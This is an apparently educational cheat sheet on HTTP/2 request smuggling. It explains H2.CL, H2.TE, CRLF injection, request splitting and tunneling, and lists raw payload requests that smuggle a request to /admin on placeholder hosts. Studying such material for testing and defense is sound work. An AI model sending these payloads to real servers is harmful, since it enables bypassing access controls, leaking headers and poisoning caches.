What is Request Smuggling HTTP/2

A web vulnerability where incompatible parsing of HTTP/2 requests between a front-end and back-end server allows attackers to interfere with how requests are processed. It can exploit differences in how headers like Content-Length or Transfer-Encoding are interpreted, potentially leading to unauthorized actions, data leakage, or bypassing security controls.

Methodology

# IMPORTANT SETTING

- Remove update content length: Ensure that content-length headers are properly managed or removed to avoid inconsistencies that can lead to desync issues.
- Important: (\r & \n) count as characters during processing, especially critical when handling headers or payload manipulation.

---------------------------------------------------------------------------------
# HTTP/2 Downgrading

HTTP/2 downgrading exploits the difference in handling between HTTP/2 requests (frontend) and the corresponding HTTP/1.1 requests (backend). This can result in HTTP desynchronization attacks.

- H2.CL (Content-Length)
- H2.TE (Transfer-Encoding)

---------------------------------------------------------------------------------
# CRLF

- CRLF stands for Carriage Return (\r) and Line Feed (\n). These characters are used to terminate lines in HTTP headers.
- Understanding CRLF usage is critical for:
    - Header injections
    - Splitting attacks
    - Response smuggling
- Always sanitize user inputs to prevent malicious use of CRLF sequences.

---------------------------------------------------------------------------------
# Request Tunneling

Request tunneling exploits the behavior of intermediary systems (e.g., proxies) to bypass security controls. It involves embedding one request inside another.

- Key Techniques:
    - Misuse of `CONNECT` requests for unrestricted forwarding.
    - Combining HTTP methods like `POST` and `GET` to bypass filtering.
- Example Scenario:
    1. Use `CONNECT` for an encrypted tunnel.
    2. Send crafted HTTP requests through the tunnel, avoiding detection by firewalls or IDS.
- Mitigation Tips:
    - Validate and restrict allowed HTTP methods.
    - Monitor proxy logs for unusual traffic patterns.

Usage

  • Leaking Internal Headers
  • Bypassing Frontend Restrictions (Request Resource)
  • Web Cache Poisoning (Change Path)

Payloads

# H2.CL

POST /target HTTP/2
Host: example.com
content-length: 0

GET /admin HTTP/1.1
Host: vulnerable-website.com
Content-Length: 10 
x=1GET / H

----------------------------------------------------------------------------------
# H2.TE

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Transfer-Encoding: chunked 

0 

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

----------------------------------------------------------------------------------
# CRLF Injection

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\nTransfer-Encoding: chunked

0

GET /admin HTTP/1.1 
Host: vulnerable-website.com 
Foo: bar

----------------------------------------------------------------------------------
# HTTP/2 Request Splitting

POST /example HTTP/2 
Host: vulnerable-website.com 
Content-Type: application/x-www-form-urlencoded 
Foo: bar\r\n 
\r\n 
GET /admin HTTP/1.1\r\n 
Host: vulnerable-website.com

----------------------------------------------------------------------------------
HTTP Request Tunneling

:method: CONNECT
:scheme: https
:path: /target
:authority: example.com
content-length: 13

0

CONNECT /admin HTTP/2
:authority: example.com

Tool

Cvss